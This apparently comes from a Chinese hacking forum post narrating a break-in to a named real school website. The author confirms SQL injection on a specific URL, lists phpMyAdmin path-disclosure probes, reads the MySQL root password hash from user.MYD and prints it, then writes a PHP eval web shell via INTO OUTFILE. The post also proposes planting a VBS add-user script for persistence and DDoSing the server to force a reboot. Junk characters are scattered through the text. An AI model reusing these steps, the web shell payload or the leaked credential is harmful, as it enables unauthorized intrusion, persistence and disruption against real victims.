第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏- O/ _9 e" ^5 l% `4 b0 i5 K5 Q" s
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!4 y5 M1 g% \% T9 ? a6 ?2 {2 }
6 E \9 Z" E2 r4 [+ C6 B
0 B! _! @, l( F" P
- s" x- X7 A5 B: w) y常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限 ) q, F" N0 i) w% J+ i; X
# K3 w( q2 Z5 O1 t% Q2 l, S7 C
那么想可以直接写入shell ,getshell有几个条件:
/ ]7 \ R% E/ f; T2 Z/ B1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
; v7 C4 a m! ?1 b2 l& s3 w/ \. f5 G q# G; x
试着爆绝对路径:
5 m5 @: W2 V, ? e$ |# Q6 r8 S1./phpMyAdmin/index.php?lang[]=1 1 ?- V5 [) R m
2./phpMyAdmin/phpinfo.php 8 M! [& e8 O' k/ m7 t; _
3./load_file() & Y3 R, ^+ [3 K( f4 `1 X
4./phpmyadmin/themes/darkblue_orange/layout.inc.php 1 I, @% U3 E2 B3 u
5./phpmyadmin/libraries/select_lang.lib.php 8 {7 U! N8 c( G9 k! Y# {" ~& f
6./phpmyadmin/libraries/lect_lang.lib.php
' W4 X( D$ v k A* @8 H. X7./phpmyadmin/libraries/mcrypt.lib.php 8 n. l3 z( D% n! ]2 `4 f
8./phpmyadmin/libraries/export/xls.php
- s6 R2 D9 G7 g4 {& y9 Y- y$ H0 i6 [. A9 w0 E5 U- X6 A2 V
均不行........................... 8 K5 G& t8 |! h) {( G) k/ a( o
- |* q+ l4 \, a) v御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php & p/ `& g$ W9 x D c2 c
$ P' U! k1 L/ G% |. }' K0 Y权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
5 V) \9 |1 Y& _. d
6 F. h+ y! [% Z' V3 _0 H默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
# [3 i4 C0 S+ f, M: c. a4 L& h$ d% b
# r0 c1 E3 y/ z9 g( t敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
4 y# q+ `7 J) u- h; f2 K, F& O( V6 p) U, O2 n% R! ]; T
想想root还可以读,读到root密码进phpmyadmin 也可以拿shell 5 K) i: ^1 s4 l) c5 [! c5 j
5 u9 L; b" r; w4 w t7 W! Y
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
5 T) ?% L% K T/ m9 ]4 T3 G+ s/ x. i5 D S/ k/ b- ^) r- h! ~6 E
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD 8 l( n! _; T: {$ Y+ u( ~* Z
& f! f. A* U& G0 l1 ?$ l成功读到root密码:
$ k, z; V' D& f2 h& C, W8 T4 O( D; R7 E' r" d
17---- r(0072)
" m& [1 C* I% o0 d, I) }' n# [18---- o(006f)
. ~1 v4 Z, N: H19---- o(006f) # x5 N9 ^4 r' r7 u1 X5 s4 T: [; G
20---- t(0074)
6 w7 q- Z& W) {2 n% d8 s21---- *(002a) 0 R q& d3 l* S) A. _, u
22---- 8(0038) " m" b+ q# b3 T8 m
23---- 2(0032) + b, ~1 Z& i# d. k3 g
24---- E(0045)
( L$ U. K# l5 ^6 j5 H- [6 D25---- 1(0031) 0 A; B; C+ w W; `1 j) i) D) N: o
26---- C(0043)
. }( r0 e# l' ?2 V27---- 5(0035)
/ n/ c, ^/ j ~ T1 h28---- 8(0038)
+ X# b6 G2 `# T4 o* K, ^29---- 2(0032) # X# t% Y/ R& U% H9 |5 N9 I$ u$ m
30---- 8(0038)
0 g7 Q8 Z) w5 y/ f31---- A(0041) $ g2 R. m0 O# D$ X8 h) o b
32---- 9(0039)
* g D I( a3 R, q7 g33---- B(0042) & Z9 K& H$ {! P; f6 V
34---- 5(0035)
, I4 j5 ^2 s7 H4 S, F) d35---- 4(0034)
, G& K: j; s3 Q# Y) N D# u' I9 y36---- 8(0038) 8 W. h3 A$ O% H
37---- 6(0036)
' _+ g/ \6 T& j1 s) r/ k38---- 4(0034) # { W# N9 }9 z9 p5 Z# z
39---- 9(0039)
% T: J. g; U* ^5 o- |" n40---- 1(0031) " N2 h5 @+ o4 F3 u2 x7 m" n
41---- 1(0031) # O& T! T: ^' R8 E7 Z8 M" ?
42---- 5(0035)
- S) [" W1 E8 i3 o3 G! c' H43---- 3(0033)
1 V( f- J y" H- P5 Q44---- 5(0035) / Y7 m9 F. P4 f% x3 t1 q" O6 [
45---- 9(0039)
3 R0 ~! x3 g; V: X+ `46---- 8(0038) 9 J" N8 T7 [" d# l& h$ T. G) g
47---- F(0046)
8 O- j" W$ }7 K6 j0 e4 @' q2 K* o48---- F(0046) ) M( q# T. T4 V' @: m! ^
49---- 4(0034) " F1 `1 v7 J* R% J
50---- F(0046) 0 D" `* K4 [9 ^5 K- l
51---- 0(0030)
/ o* E; X' \* L, [52---- 3(0033)
. @2 b! ^- q) a7 w+ K; z53---- 2(0032)
0 }% Q: L5 o% i- O- W" w/ u54---- A(0041)
/ j# U, z$ ]8 H6 C. C' Y! R55---- 4(0034)
& m- g5 `* V, M$ x; l7 {- I0 F/ }1 M56---- A(0041) 9 Q5 X/ z$ t7 A& [+ d/ ]$ P4 b/ y
57---- B(0042) : ^" K* A) f- b( [* X$ N1 F) M
58---- *(0044) 6 H8 l& {9 N9 X. ^# s, }5 j" j1 ^
59---- *(0035)
2 e2 W0 v; m+ ]! b60---- *(0041)
) Q; z# H- D/ _2 {4 [& w- O61---- *0032) 5 D+ I& a" v7 o5 a
2 y1 ^! [; y/ ]- U7 t; b! |1 D
解密后成功登陆phpmyamin 4 d! ^' G% ?" v: Q3 w4 f
& U( B# A. `' j9 P3 e! U" |6 w& e# w |3 d/ {
7 F% q" o# ?/ i. _" P
. b4 T8 H* z+ l* v' ~2 C1 q- C8 a. I
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' 2 P& p/ B* e5 y3 ^% r, ]; o [ V& B
) N3 A+ _6 K( U# W8 a
成功执行,拿下shell,菜刀连接:
0 O, ]: Y- J+ G1 o/ {1 Q7 F5 l* W" O! S) B5 g4 C2 r; @) E
服务器不支持asp,aspx,php提权无果...................
5 a' w/ l1 @5 a H9 s! T
3 c3 a1 w. \; P; |但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
7 l5 j; }( G1 p9 M& Z+ z$ R服务器上已经有个隐藏帐号了
6 R7 ]& Q n4 c% }9 `别名 administrators# F* v/ ~$ B* C) j+ y: M
注释 管理员对计算机/域有不受限制的完全访问权 6 \2 l9 ?5 `5 t8 u$ s' X
成员 9 j: E* p* t3 s. V2 P1 k
-------------------------------------------------------------------------------
1 ~% {+ o6 ~! x1 f$ O) Yadmin7 |: ]8 |$ Y3 c( U6 y
Administrator
# ?; F3 O7 ]/ C2 S( `6 V& cslipper$
1 v1 V' |" d A! X- x1 Asqluser
/ ^! ]$ n! x, w7 [( P命令成功完成。
# @8 B7 ^, q* c* N9 Z. X, v- u0 G, A3 U9 O" Q; f$ k
服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。/ `& {* d/ ]& p. D0 _. y: Y3 D
( ?7 c+ z' c' u4 V6 p& Jddos服务器重启,不然就只能坐等服务器重启了............................... [$ X0 t: w/ s% g8 k' a; ~, u
5 B" E6 j* e/ J: g2 f
0 A, d/ m) P9 z | 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
